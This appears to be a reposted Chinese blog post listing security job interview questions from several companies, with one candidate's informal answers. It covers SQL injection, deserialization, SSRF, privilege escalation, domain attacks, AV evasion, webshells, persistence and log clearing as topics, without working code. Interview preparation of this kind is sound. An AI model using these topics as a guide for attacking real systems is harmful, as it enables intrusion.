sql注入怎么预防、预编译为什么能防？
php和java侧预编译有什么区别
SSRF php 和 java 分别有什么利用方式
说一下php和java侧反序列化的异同、利用
SCA是什么，具体该怎么实现，灰盒怎么做、白盒怎么做（灰盒可以依赖agent分析，白盒结合maven插件会比单纯分析xml好一些）
log4j有哪些防御方法
从agent到字节码hook的整个流程（伪代码）
谈一下codeql，能不能用来做CI/CD
codeql哪些地方会断，该怎么处理
白盒理论了解多少，相比于灰盒
说一下SAST、DAST、IAST的优缺点
了解 devsecops 吗
未来想从事什么方向

二面

时长：45分钟

说项目
说实习 x2
终端命令的进程信息具体该如何采集
runtime.exec 后面的部分注入能不能执行
漏洞挖掘和SDL 对哪部分感兴趣

携程旅游-基础安全工程师

一面

时长：80分钟

自我介绍
反序列化流程
如何挖掘的0day
sql注入本质
sql注入怎么写马
outfile和dumpfile的区别（前者支持多行以及自定义编码）
宽字符截断的原理，说一个具体例子
SSRF利用和防御
SSRF无回显怎么利用
如果有一个接口可能有SSRF说你说你的流程
shiro说一下
shiro利用如果失败，可能是哪一环出了问题？（控制变量，逐一摸索）
文件上传如何防御
说项目，漏扫怎么做？
了解sqlmap是怎么实现的吗？或者常规xss如何扫描？
聊实习，反弹shell如何检测？
反弹shell的本质是什么？
作为一个agent，需要采集哪一些信息，如何构建进程树？
提权如何检测？
说一下其他主机侧的安全重点。
云原生，容器安全了解多少
docker逃逸说一下
云服务了解吗，打云上攻防吗？
内网渗透了解多少、AD域了解多少
隧道的本质是什么
反问

二面&三面

（二面面完根据我想做的方向帮我转了一下岗，两面差别不大，放在一起）时长：50分钟

实习2做了什么
如果在甲方做代码审计，你认为和在红队漏洞挖掘有什么不一样？
如何权衡各种漏洞扫描或者入侵检测到漏报和误报
实习具体做了什么，有什么收获
IAST 主动和被动的区别
IAST应该放在CI/CD的哪一环，了解过代理式吗？
实习过程中有什么困难
希望做自己擅长的领域，还是乐意探索新的方向？

欧科云链-安全开发

一面

时长：一个多小时

面试官思路非常清晰，做完自我介绍后就和我说面试会涉及攻防以及开发三个角度，每个环节循序渐进。

攻：攻从前中后三个阶段展开

前：

sql注入如何判断数据库类型（根据利用的难易程度展开）
xss除了打cookie还有什么其他的思路
代码审计的流程
filter的作用域
哪些业务场景可能会出现反序列化漏洞
除了readobject，还有哪些反序列化触发点
如果一个反序列化打失败了，可能存在哪些原因？
如何挖掘一条新的反序列化链
AST是什么
代码如何生成AST？
有没有不经过IR阶段（比如借助LLVM），直接生成AST的方法，和前者相比又有什么缺陷？

聊的有些偏了，回到攻击。

中：

抛开exp，如何提权（说了suid和mysql提权）
suid提权的生命周期（结合euid）
windows 烂土豆了解吗
免杀知道多少，webshell免杀，静态、动态免杀

后：

隧道相关
CS源码看过吗
内网相关，我直接说不太了解

防：

HIDS的流程是什么
IAST和RASP的区别
两者在埋点深浅上有什么处理（同样一类漏洞，会怎么做埋点处理）
埋点埋的深和埋的浅对检出率有什么影响？（一下子没转过弯来，说让我想一想）
log4j做埋点，直接在log4j的Class里做hook，和直接hook jndi的initial和lookup 有什么区别（算是对上面那个问题的提示）
了解百度的iast是怎么做的，主动式和被动式的的区别
这两者会产生脏数据吗？

开发：

聊项目
符号执行了解吗
符号执行是如何做约束求解的
哪些漏洞可以用fuzz检测到
纯白盒了解多少？说几个市面上开源或者闭源的白合工具，知道是基于什么实现的吗
反问

二面

时长：30分钟

英语水平（ ok很看重英语，包括听说读写）
聊项目
介绍了很长一段的培养方案（很吸引人）
聊理想、职业规划

某某安全公司

1.从外网打点到内网渗透哪一块比较擅长

2.拿一个站的思路

3.fofa能做哪些事

4.那么经过上述的情况，如果人家挂cdn怎么办

5.如果人家挂waf怎么办

6.如果你的手法都被拦截了，那么如何开发新手

7.从刚才一路过来，你已经成功拿到一个shell，那么有没有遇到过rasp这样组件级别防

8.现在你已经成功拿到主机权限，那么主机安全怎么打

9.拿下域怎么打其他机器

10.那么我们同一台机器夸其他机器内网方式会遇到杀毒有没有对抗经验

11.个人PC怎么维权

12.内网正向反向链接 && socket5打内网

13.如果遇到目标有IDS IPS怎么对抗

14.非可信域不出网流量怎么办

15.docker与k8s攻击手法

16.flannel calico cllium有什么区别

17.数据库提取

17.1 如果没有xp_cmd怎么办，怎么恢复xp_cmd

18.逆向会吗

19.windows有哪些下载exe方案

某某安全公司

1.在公司负责什么

2.redis拿shell方式

3.主从复制原理

4.复现过哪些漏洞

5.log4j漏洞原理

6.jndi注入不出网怎么利用

7.fastjson不出网怎么利用

8.hw中担任什么角色

9.拿到webshell后会做什么操作（windows）

10.拿到webshell，权限为iis，有什么提权方法

11.linux提权方法

12.实战中有遇到过提权吗？讲一下案例

13.拿到webshell怎么上线cs

14.powershell加载时有哪几个阶段

15.开着杀软时，powershell被拦截，怎么弄

16.马子的免杀怎么做

17.只有一个网卡，通过什么方式判断内网中是否有其他网段

18.有域环境的话怎么操作？

19.域内信息收集

20.实战中定位域控

21.工作组环境下怎么判断是否有域环境

22.hw中印象深刻的一次渗透

23.第一台服务器出网，第二台不出网，只能通过第二台机子搭代理进去（不用上线的方式），怎么操作

24.LDAP协议？（活动目录结构）

25.kerberos协议

26.黄金票据

27.个人对于哪方面比较感兴趣

28.exchange了解吗

29.进入域内，会用哪几种方式拿域控

30.ms14_068原理

31.前段时间域内提权漏洞讲一下

32.域控补丁打全了，怎么打域控

33.怎么定位域管曾经登录哪些机子

34.ACL讲一下

35.什么语言擅长，写过什么工具

36.拿到win权限后，权限维持

37.计划任务需要什么权限（接上一个）

38.令牌窃取讲一下（能不能从普通用户窃取到管理员）

某某安全公司

1.自我介绍

2.hw得项目中权限维持和提升是如何做的（项目）

3.还是关于hw得项目细节询问（项目）

4.hw项目得细节询问（也是项目）

5.钓鱼的操作讲一下（项目+1）

6.批量上线后做了什么（项目）

\7. 拿下一个shell后，内网横向怎么做的

8.还是项目

9.检测到ip发起攻击，后续操作怎么进行（项目）

10.如果传的是exe，怎么弄（接上一个）

11.给的是一个ip，伪装成cmd.exe，怎么办（接上一个）

12.之前有没有接触过我们的产品

13.目前真实溯源的手法有没有了解（比如说昵称）

14.红队攻防演练，你应该关注的漏洞是什么（换句话说，也就是打点遇到的比较多的）

15.SQL注入了解的怎么样，平常对哪个数据库了解一点

16.oracle一般怎么测试

17.mysql的原理、检测方法、利用方法、绕waf讲一下，越详细越好

18.mysql查询支持16进制吗

19.mysql写shell的条件（绝对路径是空怎么弄）

20.sqlserver执行命令有几种

21.xpcmdshell执行时断掉怎么弄（ctrl+c会怎样）

22.文件上传绕黑名单

23.如何判断白名单还是黑名单

24.nginx的phpstudy的一个漏洞有了解吗

25.文件解析，iis，nginx，apache

26.iis解析的几种后缀

27.内网免杀了解多少

28.平时的项目是一线参与吗？职责是什么？

29.xss平时怎么测？说几个详细一点的场景

30.黑名单拦截一些属性，alt，error之类的，怎么绕过（接上个）

31.过滤掉所有的on事件，怎么弄

32.拦截掉了alt，怎么弄？

33.弹框有哪几个属性

34.快速定位域控

35.拿下域内机子后，如何打域控

36.黄金白银票据原理区别

37.fscan软件的设计你觉得哪里不好，爆破ftp的时候卡了怎么办

38.编程语言会哪些

39.python平时用到的库

40.正则了解多少，识别手机号怎么弄

41.有什么问题吗

某某安全公司

1.做个自我介绍

2.有过hvv或重保项目经验吗

3.如果有，介绍一下自己所负责的工作

4.讲一下自己渗透测试的流程思路

5.了解逻辑漏洞吗，讲一下

6.讲一下sql注入的原理

7.了解jsonp漏洞吗

8.会日志审计吗

9.如何判断误报

10.22端口，1433端口，3306端口分别对应什么服务

11.应急响应的流程

12.文件上传怎么防护

13.php有哪些危险函数

14.xss怎么防护

15.用过哪些安全工具

16.讲一下这些安全工具的功能

某某安全公司-信息安全工程师

1.如何防范常见的 Web 攻击

2.重要协议分布层

3.arp 协议的工作原理

4.rip 协议是什么？

5.rip 的工作原理

6.什么是 RARP？

7.工作原理 OSPF 协议？

8.OSPF 的工作原理 TCP 与 UDP 区别总结什么是三次握手四次挥手？

9.tcp 为什么要三次握手？

10.dns 是什么？

11.dns 的工作原理

12.一次完整的 HTTP 请求过程

13.Cookies 和 session 区别

14.GET 和 POST 的区别

15.HTTPS 和 HTTP 的区别 session 的工作原理？

16.http 长连接和短连接的区别

17.OSI 的七层模型都有哪些？

18.session 的工作原理？

19.什么是 TCP 粘包/拆包？

20.发生原因？

21.解决方案 TCP 如何保证可靠传输？

22.URI 和 URL 的区别什么是 SSL ？

23.https 是如何保证数据传输的安全（SSL 是怎么工作保证安全的）

24.TCP 对应的应用层协议，

25.UDP 对应的应用层协议

26.常见的状态码有哪些？

27.什么是 SQL 注入攻击

某某安全公司

1.不出网有什么方法，正向shell 方法除了reg之类的，还有什么？

2.域内委派

3.dpapi机制说下，能干嘛

4.fastjson 不出网

5.shiro漏洞类型，721原理，721利用要注意什么？

7.weblogic 漏洞类型都有啥,原理

8.dll劫持，dll注入

9.内网优先爆破测试的端口、为什么；如果只有3389开放，爆破3389的实际影响…

10.window2003 frp nps为神马用不了

11.钓鱼方法姿势…除了exe这种双击的，还有什么

12.redis window shell方法

13.bypass uac 技巧，方法，原理

14.内存马 filter shell …

15.PTH深度原理，利用条件

16.抓hash方法,有杀软抓不到尼…

17.Windows defender安全机制

18.有的时候抓到的hash不是明文为啥

19.hvv三大洞挨个说…

20.cs是否有二次开发过,cna脚本有没有写过

北京某某信安-安全服务工程师

面试过程：电话面试。总共经历了三次面试。还有两三次人力资源的沟通。

面试官的问题：

自我介绍

巴拉巴拉~

红蓝队经验

巴拉巴拉~ 红队的话主要就是地市级别的多一些，以抢时间为主，一般都

是三个人，一般按照 1（沟通整理资产）1（打点）1（提交）或者 3（整

理资产打点利用~）统一提交。还有就是打内网比较赖的话就端口转发，

扫弱口令、ms17-010、心脏滴血这些~

省级的话基本都在二线，不过也拿过几个靶标_{但是内网自己做的很少}

其他的问题关于，一些自己的名次相关的就不细说了。

蓝队的话还是地市级别的_哈哈哈主要是配合自己厂商的产品+绿盟的

isop 之类的平台+其他友商的产品进行溯源分析到 ip，封就 ok 了，没那

么多讲究。

关于 shiro 漏洞了解多少~

ps:自己了解吧。java 的东西我目前没兴趣。

说说你 APP 测试的经验~

服务端就正常测啊~一般情况下，xposed+fiddler 就 ok 了，不过有些 APP

不允许模拟器，那就用 drony 相当于又开了个 vpn，app 走这个，然后实

现抓包，不过得用低版本的安卓机，高版本的有点问题，解决不了。

xposed 用的什么框架~有没有自己写过 app 解密~

justtrustme_没有

Xss_SSRFSQL 产生的原因_修复方案

没啥好说的

如果你 Xss 打了后台，发现是内网的怎么办~

emmm，以前确实遇到过，放弃了,hhhhh。让我临场想一想，能不能配合脚

本扫下内网啥的，反正我也不会_{面试官说没关系}下一问。

假设给你一个目标站，你要怎么做？

信息搜集（省略_{）授权到位}直接 xray 配合 awvs 被动扫（只要不登录就

ok）或者直接 awvs 批量跑，反正效率第一嘛。要求高的话，继续手工给

他做精细活呗。主站功能点多的话，找找功能点呗，没准一个头像上传

getshell,蚁剑 bypass disable function 舒舒服服，之后万一烂土豆啥的

提个权，收工。要是真有这么简单，我怕不是直接去红队了，hhhh。这里，

大家手法不同，就举个栗子吧~

linux 和 windows 提权知多少。

linux 的什么 find 提权啊_一大堆还有烂土豆等等，就注意最高位 0755就对了，然后就是最近的 sudo 提权。windows 就内核提权呗，systeminfo,完事。

会不会进程注入？

不会。

做过几次应急？

没几次，本身应急就少，分到个人身上，也就一两次。一次教育的~没啥意思。一次 linux 的挖矿~也挺无聊的。

讲讲 windows 和 linux 应急你咋做的

windows 的日志分析那几个 pid 啥的~linux cronb 那几个东西~允许上 D盾啥的，直接上去扫一波后门，顺藤摸瓜_{分析分析日志等等}这玩意就不细讲了，因为我现在直接做也做不下来，得照着笔记和文档做了。

用过没用过我们家的 goby 和 fofa?

goby 那肯定用过啊，hvv 神器，fofa

会不会 apk 反编译？

加壳的不会，反正客户端的就 apktools 那些，照着手册做呗，然后就是 adb那些。

你 python 水平咋样？

普通的 http 的脚本还是勉强 ok 的。问了一些模块 re、bs4、request 这些~

你 php 怎么审的？

目前框架类的还是灰盒为主_巴拉巴拉你要说pop链，我能多多少少看懂，

但是 tp 的 pop 链我写不出来，不过普通的 ctf 里的 pop 链我还是能写出来的。

其他的问题就比较私人了~就不说了。大概就这些吧，其他的问题就是别的公司的安全研究和红队方向的了，也想不起来多少了。

深信服一面

1.了解哪些漏洞

2.文件上传有哪些防护方式

3.用什么扫描端口，目录

4.如何判断注入

5.注入有防护怎么办

6.有没有写过 tamper

7.3306 1443 8080 是什么端口

8.计算机网络从物理层到应用层 xxxx

9.有没有 web 服务开发经验

10.如何向服务器写入 webshell

11.有没有用过 xss 平台

12网站渗透的流程

13.mysql 两种提权方式

14.常见加密方式 xxx

15.ddos 如何防护

16.有没有抓过包，会不会写 wireshark 过滤规则

17.清理日志要清理哪些

参考

https://github.com/lu2ker/pentest-treasure

https://github.com/uuuuuuuzi/BugRepairsuggestions

https://github.com/FeeiCN/SecurityInterviewGuide

https://github.com/vvmdx/Sec-Interview-4-2023

mFcoder187974305

关注

33
点赞
踩
14

收藏

觉得还不错? 一键收藏
打赏
0
评论
网络安全面试题目及总结

面试官问的东西技术难度比较广和深，而且都是基于实际的应用场景来问的。. ,优点就是性能好，能探测到更多的威胁情报之类的（大家脑补吧），感觉不足的就是探测和分析出的威胁，没法给出具体的流量片段，没法通过一个设备有效确定攻击，没有流量特征不好和其他全流量设备进行联动，可能是设备出场的保护机制，保护特征库不被外泄。很奇葩的剧情，一面面试官面完告诉我有base北京base深圳问我是不是想要深圳的，我说是，结果过了一个多星期hr告诉我因为我一面面试官是北京的，然后我选了深圳，所以一面不作数，重新约了一面。
复制链接

扫一扫